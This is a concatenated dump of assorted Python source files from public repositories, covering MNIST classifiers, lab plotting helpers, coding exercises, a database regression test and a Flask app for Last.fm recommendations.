X_test = X_test.reshape(10000, 784)
X_train = X_train.astype('float32')
X_test = X_test.astype('float32')
X_train /= 255
X_test /= 255
print(X_train.shape[0], 'train samples')
print(X_test.shape[0], 'test samples')
nb_classes = 10
# convert class vectors to binary class matrices
Y_train = np_utils.to_categorical(y_train, nb_classes)
Y_test = np_utils.to_categorical(y_test, nb_classes)
def clf_svm():
Y_train_list=[list(item).index(1.0) for item in Y_train]
Y_test_list=[list(item).index(1.0) for item in Y_test]
clf=svm.SVC(decision_function_shape='ovo')
clf.fit(X_train,Y_train_list)
print(clf.score(X_test,Y_test_list))
def clf_nn():
from keras.models import Sequential
from keras.layers.core import Dense, Dropout, Activation
from keras.optimizers import SGD, Adam, RMSprop
batch_size = 128
nb_epoch = 20
model = Sequential()
model.add(Dense(512, input_shape=(784,)))
model.add(Activation('relu'))
model.add(Dropout(0.2))
model.add(Dense(512))
model.add(Activation('relu'))
model.add(Dropout(0.2))
model.add(Dense(10))
model.add(Activation('softmax'))
model.summary()
model.compile(loss='categorical_crossentropy',
optimizer=RMSprop(),
metrics=['accuracy'])
history = model.fit(X_train, Y_train,
batch_size=batch_size, nb_epoch=nb_epoch,
verbose=1, validation_data=(X_test, Y_test))
score = model.evaluate(X_test, Y_test, verbose=0)
print('Test score:', score[0])
print('Test accuracy:', score[1])
if __name__=="__main__":
for clf in (clf_nn,clf_svm):
print(clf.__name__)
from time import time
start=time()
clf()
end=time()
print(end-start)
| true |
cdf27515a22178fbe50a82245b34b24fa457a55f
|
Python
|
qcrew-lab/qcore
|
/codebase/datasaver/plot.py
|
UTF-8
| 2,276 | 2.96875 | 3 |
[] |
no_license
|
import numpy as np
from qcrew.codebase.analysis.fit import do_fit, eval_fit
def fit_analysis(data: dict, i_tag: str, q_tag: str, x: np.ndarray, fit_function: str) -> None:
if i_tag in data.keys():
last_avg_i = data[i_tag][-1]
else:
raise ValueError(f"No data for the tag {i_tag}")
if q_tag in data.keys():
last_avg_q = data[q_tag][-1]
else:
raise ValueError(f"No data for the tag {q_tag}")
signal = np.abs(last_avg_i + 1j * last_avg_q)
fit_params = do_fit(fit_function, x, signal) # get fit parameters
y_fit = eval_fit(fit_function, fit_params, x) # get fit values
return signal, y_fit, fit_params
def live_plot(ax, x, y, fit_y, yerr=None, fit_function):
pass
def plot_fit(xs, ys, axis, yerr=None, fit_func="sine"):
if yerr is not None:
# Calculate average error throughout all datapoints
avg_yerr = np.average(yerr)
error_label = "average error = {:.3e}".format(avg_yerr)
axis.errorbar(
xs,
ys,
yerr=yerr,
marker="o",
ls="none",
markersize=3,
color="b",
label=error_label,
)
params = fit.do_fit(fit_func, xs, ys)
fit_ys = fit.eval_fit(fit_func, params, xs)
# Convert param values into conveniently formatted strings
param_val_list = [
key + " = {:.3e}".format(val.value) for key, val in params.items()
]
# Join list in a single block of text
label_text = "\n".join(param_val_list)
axis.plot(xs, fit_ys, color="m", lw=3, label=label_text)
# plt.xlabel("time clock")
# plt.ylabel("amps")
return params
class FakeLivePlotter:
def __init__(self):
self.fig = plt.figure()
self.ax = self.fig.add_subplot(1, 1, 1)
self.hdisplay = display.display("", display_id=True)
def plot(self, x, y, N: int = None, fit_func: str = None): # 2D plots only
""" """
self.ax.clear()
self.ax.plot(x, y) # plot data
if fit_func is not None:
plot_fit(x, y, self.ax, fit_func=fit_func) # plot fit
if N is not None:
self.ax.set_title(f"Rolling average after {N} reps")
self.hdisplay.update(self.fig) # update figure
| true |
2635985781e149b307532f2e3834ea73c52fd497
|
Python
|
EwenFin/exercism_solutions
|
/python/robot-simulator/robot_simulator.py
|
UTF-8
| 1,101 | 3.890625 | 4 |
[] |
no_license
|
# Globals for the bearings
# Change the values as you see fit
EAST = 2
NORTH = 1
WEST = 4
SOUTH = 3
class Robot(object):
def __init__(self, bearing=NORTH, x=0, y=0):
self.bearing = bearing
self.x = x
self.y = y
@property
def coordinates(self):
return (self.x, self.y)
def turn_right(self):
if self.bearing == 4:
self.bearing = 1
else:
self.bearing = self.bearing + 1
def turn_left(self):
if self.bearing == 1:
self.bearing = 4
else:
self.bearing = self.bearing - 1
def advance(self):
if self.bearing == 1:
self.y +=1
elif self.bearing == 2:
self.x +=1
elif self.bearing == 3:
self.y -= 1
elif self.bearing == 4:
self.x -= 1
def simulate(self, string):
for char in string:
if char == 'L':
self.turn_left()
elif char == 'R':
self.turn_right()
elif char == 'A':
self.advance()
| true |
7d0d78d30dfabfe674540a300ce16a28811754e0
|
Python
|
epot/Domotic-prototype
|
/src/opennitoo/buscommand.py
|
UTF-8
| 506 | 2.734375 | 3 |
[] |
no_license
|
'''
Created on 22 janv. 2011
@author: epot
This module handles bus command messages
'''
class BusCommand():
'''
classdocs
'''
def __init__(self, who, what, where):
'''
Constructor
'''
self.who = who
self.what = what
self.where = where
def getMessage(self):
strMsg = "*" + str(self.who) + "*" + str(self.what) + "*" + str(self.where) + "##"
print "getMessage= \"" + strMsg + "\""
return strMsg
| true |
b83bd2e0b72bea6f1700b73b41307432bbaca4ac
|
Python
|
jcrumpton/py-mcftracker
|
/test.py
|
UTF-8
| 1,113 | 2.734375 | 3 |
[
"MIT"
] |
permissive
|
"""
Copyright 2018 watanika, all rights reserved.
Licensed under the MIT license <LICENSE-MIT or
http://opensource.org/licenses/MIT>. This file may
not be copied, modified,or distributed except
according to those terms.
"""
import time
from mcftracker import MinCostFlowTracker
# Example usage of mcftracker
def main():
# Prepare initial detecton results, ground truth, and images
# You need to change below
detections = {"image_name": [x1, y1, x2, y2, score]}
tags = {"image_name": [x1, y1, x2, y2]}
images = {"image_name": numpy_image}
# Parameters
min_thresh = 0
P_enter = 0.1
P_exit = 0.1
beta = 0.5
fib_search = True
# Let's track them!
start = time.time()
tracker = MinCostFlowTracker(detections, tags, min_thresh, P_enter, P_exit, beta)
tracker.build_network(images)
optimal_flow, optimal_cost = tracker.run(fib=fib_search)
end = time.time()
print("Finished: {} sec".format(end - start))
print("Optimal number of flow: {}".format(optimal_flow))
print("Optimal cost: {}".format(optimal_cost))
print("Optimal flow:")
print(tracker.flow_dict)
if __name__ == "__main__":
main()
| true |
7abe2deb65bf33b9b5274969f5b9948f5c471515
|
Python
|
KlemenGrebovsek/cargo-stowage-optimization
|
/src/core/benchmark/benchmark.py
|
UTF-8
| 2,194 | 2.75 | 3 |
[
"MIT"
] |
permissive
|
import math
import numpy as np
from src.model.dataset import Dataset
from src.domain.cargo_space import CargoSpace
class BenchmarkC(object):
def __init__(self, dataset: Dataset):
self.Lower: int = 0
self.Upper: int = 1
self._dataset: Dataset = dataset
self._packages_by_station: list = [[] for _ in range(dataset.total_stations)]
# Sort packages by station of loading
for package in self._dataset.packages:
self._packages_by_station[package.station_in - 1].append(package)
def function(self):
def evaluate(d: int, sol: list) -> int:
total_package_movements, sol_index, total_lay_ds, total_we_ds = 0, 0, 0, 0
cargo_space = CargoSpace(width=self._dataset.width, height=self._dataset.height)
# Set column boundaries.
cargo_sp_col_sep = np.linspace(self.Lower, self.Upper, self._dataset.width + 1)
cargo_sp_col_sep[self._dataset.width] += 0.1
# Define package column positions via given solution.
for package in self._dataset.packages:
package.given_col_index = np.digitize(sol[sol_index], cargo_sp_col_sep) - 1
sol_index += 1
# Simulate ship route.
for station in range(1, self._dataset.total_stations + 1, 1):
summary = cargo_space.simulate_stop_at_station(station, self._packages_by_station[station - 1])
total_package_movements += summary.movements_sum
# Calculate layout and weight distribution in cargo space.
perfect_lay = round(sum(summary.lay_dist) / len(summary.lay_dist))
perfect_we = round(sum(summary.weight_dist) / len(summary.weight_dist))
for x in range(self._dataset.width):
total_lay_ds += abs(perfect_lay - summary.lay_dist[x])
total_we_ds += abs(perfect_we - summary.weight_dist[x])
# Return calculated fitness.
return int((total_package_movements * 5) + (total_lay_ds * 3) + (math.sqrt(total_we_ds)*3))
return evaluate
| true |
2c5569c99d54e1fa5aa523b6071862f237bc6334
|
Python
|
DemondLove/Python-Programming
|
/CodeFights/28. alphabetShift.py
|
UTF-8
| 951 | 4.53125 | 5 |
[] |
no_license
|
'''
Given a string, your task is to replace each of its characters by the next one in the English alphabet; i.e. replace a with b, replace b with c, etc (z would be replaced by a).
Example
For inputString = "crazy", the output should be alphabeticShift(inputString) = "dsbaz".
Input/Output
[execution time limit] 4 seconds (py3)
[input] string inputString
A non-empty string consisting of lowercase English characters.
Guaranteed constraints:
1 ≤ inputString.length ≤ 1000.
[output] string
The resulting string after replacing each of its characters.
'''
import string
def alphabeticShift(inputString):
alphabet = [x for x in string.ascii_lowercase]
inputString = [x for x in inputString]
for i in range(len(inputString)):
alpha = alphabet.index(inputString[i])
if alpha == 25:
inputString[i] = 'a'
else:
inputString[i] = alphabet[alpha+1]
return ''.join(inputString)
| true |
581d9ec7fbbba9654e2661d6feac9c2f979319f9
|
Python
|
brauliotegui/SPICED
|
/Week_10/flask-app/recommender.py
|
UTF-8
| 2,703 | 2.90625 | 3 |
[] |
no_license
|
"""Machine-Learning Code that returns movie recommendations"""
import numpy as np
from sklearn.decomposition import NMF
from sklearn.metrics.pairwise import cosine_similarity
import pandas as pd
import pickle5 as pickle
MOVIES = pd.read_csv('ml-latest-small/movies.csv')
RATINGS = pd.read_csv('ml-latest-small/ratings.csv')
DF = pd.merge(RATINGS, MOVIES, left_on='movieId', right_on='movieId')
MIDS = RATINGS['movieId'].unique()
MIDS = pd.DataFrame(MIDS)
MOVIES_DF = pd.merge(MIDS, MOVIES, left_on=0, right_on='movieId')
# better:
with open("nmf_model.pkl", 'rb') as file:
m = pickle.load(file)
P = m.components_
def calculate_best_movies(result_html):
''' doc '''
column_names = ['title', 'rating']
user_input = pd.DataFrame(result_html, columns=column_names)
r_true = DF.pivot(index='userId', columns='movieId', values='rating')
r_true.fillna(2.5, inplace=True)
m = NMF(max_iter=500, n_components=21)
m.fit(r_true)
P = m.components_
user_ratings = pd.merge(MOVIES_DF, user_input, left_on='title', right_on='title', how='left')
new_user = user_ratings['rating'].fillna(2.5)
new_u = np.array(new_user).reshape(1, -1)
profile = m.transform(new_u)
result = np.dot(profile, P)
MOVIES_DF['recom'] = result.T
result = MOVIES_DF.sort_values('recom', ascending=False)['title'].head(5)
return result
def similar_users_recommender(result_html):
''' doc '''
column_names = ['title', 'rating']
user_input = pd.DataFrame(result_html, columns=column_names)
user_ratings = pd.merge(MOVIES_DF, user_input, left_on='title', right_on='title', how='left')
query = user_ratings['rating']
query = np.array(query)
m_matrix = DF.pivot_table(values='rating', index='userId', columns='movieId')
m_matrix.loc['e'] = query
m_matrix = m_matrix.sub(m_matrix.mean(axis=0), axis=1)
m_matrix.fillna(0, inplace=True)
cosim = cosine_similarity(m_matrix)[-1]
cosim = pd.DataFrame(cosim)
top10 = cosim.sort_values(by=[0], ascending=[False]).head(11) #order by most similar users
similar_users = list(top10.index)
similar_users = similar_users[1:]
users_r = m_matrix.loc[similar_users, :]
movie_ratings_avg = users_r.mean()
movie_ratings_avg = pd.DataFrame(movie_ratings_avg)
rec_movies = movie_ratings_avg.sort_values(by=[0], ascending=[False]).head(10)
rec_movies = pd.merge(rec_movies, MOVIES, left_on='movieId', right_on='movieId', how='left')
result = rec_movies['title']
return result
def movieId_to_title(ids):
''' Given a list of movieIds, returns a corresponding list of movie titles.'''
return MOVIES.set_index('movieId').loc[ids]['title'].tolist()
| true |
1124f53f4cfc8b811e067349cc49078d1ad65549
|
Python
|
n0thing233/n0thing233.github.io
|
/noodlewhale/amazon/VO/algorithm/207. Course Schedule.py
|
UTF-8
| 1,025 | 3.265625 | 3 |
[] |
no_license
|
#一遍bug-free
#topological sort, for indegree = 0 ,push to queue ,pop queue , if any node left, then cannot, else can
#time:O(V+E)
#space:O(E+V)
from collections import deque,defaultdict
class Solution:
def canFinish(self, numCourses: int, prerequisites: List[List[int]]) -> bool:
neighbors = defaultdict(list)
for i in prerequisites:
neighbors[i[1]].append(i[0])
indegree = [0]*numCourses
for i in range(numCourses):
if i not in neighbors:
neighbors[i] = []
for j in neighbors[i]:
indegree[j] += 1
queue = deque()
for i,j in enumerate(indegree):
if j == 0:
queue.append(i)
num_res = numCourses
while queue:
curr = queue.popleft()
num_res -= 1
for i in neighbors[curr]:
indegree[i] -= 1
if indegree[i] == 0:
queue.append(i)
return True if num_res == 0 else False
| true |
7a443ab3885153c224a1135267315dd9f369c94c
|
Python
|
chris-0511/crawler
|
/Dating_software.py
|
UTF-8
| 866 | 2.765625 | 3 |
[] |
no_license
|
# ch23_3.py
import requests
import csv
def get_data(page):
url = 'http://www.lovewzly.com/api/user/pc/list/search?'
form_data = {'gender':'2', 'mary':'1', 'page':'1'}
# 傳遞參數
form_data['page']=page
datahtml = requests.get(url, params=form_data)
datas = datahtml.json()
nickname,bir,education,height,city,picurl=[],[],[],[],[],[]
data = datas['data']['list']
for d in data:
nickname.append(d['username'])
print('暱稱:',d['username'])
bir.append(d['birthdayyear'])
print('出生年:',d['birthdayyear'])
height.append(d['height'])
print('身高:',d['height'])
city.append(d['city'])
print('城市:',d['city'])
print('上面為第 %s 頁-----------------------------------------------------'%(page))
for i in range(1,11):
get_data(i)
| true |
a38302f284a9844f2ae458e6f9ace69b15d012d0
|
Python
|
sbridgens/Basic_Scripts_Collection
|
/Test_BOTO_S3Downloader.py
|
UTF-8
| 745 | 2.828125 | 3 |
[] |
no_license
|
#!/usr/local/bin/python2.7
import os
import boto3
import sys
s3bucket='SomeBucket'
s3basekey='SomeKey'
s3asset=sys.argv[1]
def Download_From_S3():
try:
session = boto3.Session(profile_name='s3prod')
dl_client = session.client('s3')
print("[+] Attempting download of s3 media file")
dl_client.download_file(Bucket=s3bucket,
Key=''.join(s3basekey + s3asset),
Filename=s3asset)
print("[+] Successfully downloaded s3 media file: %s" % s3asset)
return "Success"
except Exception as ds3_ex:
print("[-] Error Downloading media from S3, Error message: {0}".format(ds3_ex))
Download_From_S3()
| true |
b31e8a7cf46c0c4f459acd81f32f4c2ac930e462
|
Python
|
FirebirdSQL/firebird-qa
|
/tests/bugs/core_3314_test.py
|
UTF-8
| 922 | 2.546875 | 3 |
[
"MIT"
] |
permissive
|
#coding:utf-8
"""
ID: issue-3681
ISSUE: 3681
TITLE: Dependencies are not removed after dropping the procedure and the table it
depends on in the same transaction
DESCRIPTION:
JIRA: CORE-3314
FBTEST: bugs.core_3314
"""
import pytest
from firebird.qa import *
init_script = """create table t (a int);
SET TERM !!;
create procedure p as begin delete from t; end!!
SET TERM !!;
commit;
"""
db = db_factory(init=init_script)
test_script = """SELECT 1 FROM RDB$DEPENDENCIES WHERE RDB$DEPENDED_ON_NAME='T';
drop procedure p;
drop table t;
commit;
SELECT 1 FROM RDB$DEPENDENCIES WHERE RDB$DEPENDED_ON_NAME='T';
"""
act = isql_act('db', test_script)
expected_stdout = """
CONSTANT
============
1
"""
@pytest.mark.version('>=3')
def test_1(act: Action):
act.expected_stdout = expected_stdout
act.execute()
assert act.clean_stdout == act.clean_expected_stdout
| true |
b4776ae7c617a8cff2fb00b39571bd25b8ddb986
|
Python
|
PushkrajSonalkar/Python11-07-2019
|
/sets_prog/ex1.py
|
UTF-8
| 915 | 4.625 | 5 |
[] |
no_license
|
# creating a set
# Python program to demonstrate
# Creation of Set in Python
# Creating a Set
set1 = set()
print "Initial blank set\n", set1
# Creating a Set with
# the use of a String
set2 = set("Arnav")
print "\nSet with use of String:", set2
# Creating a Set with
# the use of a List
set3 = set(["Arnav", "Ravindra", "Sonalkar"])
print "\nSet with use of List: ", set3
# Creating a Set with
# a List of Numbers
# (Having duplicate values)
set4 = set([1, 2, 4, 4, 3, 3, 3, 6, 5])
print "\nSet with use of List of Numbers: ", set4
# Creating a Set with
# a mixed type of values
# (Having numbers and strings)
set5 = set([1, 2, "Arnav", 4, "Ravindra", 5, "Sonalkar"])
print "\nSet with use of mixed vales: ", set5
# Copy a set
set6 = set2.copy()
print "\nCopied Set: ", set6
# issubset()
print set2.issubset(set6)
# issuperset
print set2.intersection(set6)
# max
print max(set4)
# min
print min(set4)
| true |
cb0600bf47a369b59cf0f18c0f9e84fc8c02c0be
|
Python
|
High-Bee/TIL
|
/Chatbot/python-recap-master/백준.py
|
UTF-8
| 1,641 | 3.984375 | 4 |
[] |
no_license
|
# 문제
# N개의 정수가 주어진다. 이때, 최솟값과 최댓값을 구하는 프로그램을 작성하시오.
# 입력
# 첫째 줄에 정수의 개수 N (1 ≤ N ≤ 1,000,000)이 주어진다. 둘째 줄에는 N개의 정수를 공백으로 구분해서 주어진다.
# 모든 정수는 -1,000,000보다 크거나 같고, 1,000,000보다 작거나 같은 정수이다.
# 출력
# 첫째 줄에 주어진 정수 N개의 최솟값과 최댓값을 공백으로 구분해 출력한다.
# 예제 입력 1
# 5
# 20 10 35 30 7
# 예제 출력 1
# 7 35
import sys
<<<<<<< HEAD
# n = int(input())
# a = [sys.stdin.readline() for i in range(n)]
# a = [20, 10, 35, 30, 7]
n = int(input())
a = list(map(int,sys.stdin.readline().split()))
print(min(a), max(a))
# 문제
# 9개의 서로 다른 자연수가 주어질 때, 이들 중 최댓값을 찾고 그 최댓값이 몇 번째 수인지를 구하는 프로그램을 작성하시오.
# 예를 들어, 서로 다른 9개의 자연수
# 3, 29, 38, 12, 57, 74, 40, 85, 61
# 이 주어지면, 이들 중 최댓값은 85이고, 이 값은 8번째 수이다.
# 입력
# 첫 째 줄부터 아홉 번째 줄까지 한 줄에 하나의 자연수가 주어진다. 주어지는 자연수는 100 보다 작다.
# 출력
# 첫째 줄에 최댓값을 출력하고, 둘째 줄에 최댓값이 몇 번째 수인지를 출력한다.
# 예제 입력 1
# 3
# 29
# 38
# 12
# 57
# 74
# 40
# 85
# 61
# 예제 출력 1
# 85
# 8
=======
n = int(input("숫자를 입력하세요 : "))
a = list(map(int, sys.stdin.readline().split()))
print(min(a), max(a))
>>>>>>> 3ff7768fa73f51837494d5de2d5f382faab7f669
| true |
98bea716038dd2e5db3c2fb69b4730cb60c3d20d
|
Python
|
suitengu/recenh
|
/app/routes.py
|
UTF-8
| 4,414 | 2.65625 | 3 |
[] |
no_license
|
import json
import os
import requests
from app import app
from app.forms import UsernameForm
from flask import Flask, flash, request, redirect, url_for, abort
from flask import send_from_directory
from flask import render_template
from werkzeug.utils import secure_filename
from bs4 import BeautifulSoup
HEADERS = {
'UserAgent': 'LastFM Recommendations Enhanced Tool',
'From': 'kingzoloft@gmail.com'
}
LFM_API_URL = 'https://ws.audioscrobbler.com/2.0/'
@app.route('/', methods=['GET', 'POST'])
def index():
form = UsernameForm()
if form.validate_on_submit():
flash('wtf does flash do?')
return redirect(url_for('get_recs', username=form.username.data))
return render_template('index.html', form=form)
@app.route('/recs/<username>')
def get_recs(username: str, use_followers=False, use_neighbours=True):
neighbours_list = []
following_list = []
if use_followers:
# get all users the user follows
following_list = get_following(username)
if use_neighbours:
# get all the user's neighbours
neighbours_list = get_neighbours(username)
user_list = list(set().union(following_list, neighbours_list))
# get top artists from each of them
user_top_artists = {}
for user in user_list:
user_top_artists[user] = get_top_artists(user, 15)
merged_artist_list = list(set().union(*list(user_top_artists.values())))
user_artist_list = get_top_artists(username, limit=None)
# subtract user top artists from the list, though the 'long tail' is still
# left and has to be dealt with shittily
recs_list = list(set(merged_artist_list).difference(set(user_artist_list)))
return render_template('recs.html', recs=recs_list)
def get_following(username: str) -> list:
"""
Get the list of users the specified user follows
@param username -- the username whose following list we will get
@return list of the following usernames
"""
endpoint_url = '{}?method=user.getfriends&user={}&api_key={}&format=json'.format(LFM_API_URL,
username, app.config['LFM_API_KEY'])
lfm_res = requests.get(endpoint_url, headers=HEADERS)
if not lfm_res.ok:
abort('idk, something went wrong')
lfm_res_dict = json.loads(lfm_res.text)
following_list = [user['name'] for user in lfm_res_dict['friends']['user']]
return following_list
def get_neighbours(username: str) -> list:
"""
Get the list of users who are neighbours of the specified user
@param username -- the username whose neighbours we will get
@return list of the neighbours' usernames
"""
url = 'https://www.last.fm/user/{}/neighbours'.format(username)
res = requests.get(url)
if res.status_code != requests.codes.ok:
abort('request error')
# there's no API route for neighbours, good thing this isn't hard to do with
# CSS selectors!
soup = BeautifulSoup(res.text, 'html.parser')
user_link_list = soup.select('a.user-list-link')
user_list = [user_link.text for user_link in user_link_list]
return user_list
def get_top_artists(username, limit=8):
get_all = False
if limit is None:
limit = 1000
get_all = True
endpoint_url = '{}?method=user.gettopartists&user={}&limit={}&api_key={}&format=json'.format(LFM_API_URL,
username, limit, app.config['LFM_API_KEY'])
lfm_res = requests.get(endpoint_url, headers=HEADERS)
if not lfm_res.ok:
abort('idk, something went wrong')
lfm_res_dict = json.loads(lfm_res.text)
artist_list = [artist['name'] for artist in lfm_res_dict['topartists']['artist']]
if not get_all:
return artist_list
else:
page_count = int(lfm_res_dict['topartists']['@attr']['totalPages'])
for page in range(2, page_count+1):
# TODO: do something about the long URL
endpoint_url = '{}?method=user.gettopartists&user={}&limit={}&page={}&api_key={}&format=json'.format(LFM_API_URL, username, limit, page, app.config['LFM_API_KEY'])
lfm_res = requests.get(endpoint_url, headers=HEADERS)
if not lfm_res.ok:
abort('idk, something went wrong')
lfm_res_dict = json.loads(lfm_res.text)
artist_append_list = [artist['name'] for artist in lfm_res_dict['topartists']['artist']]
artist_list = artist_list + artist_append_list
return artist_list
| true |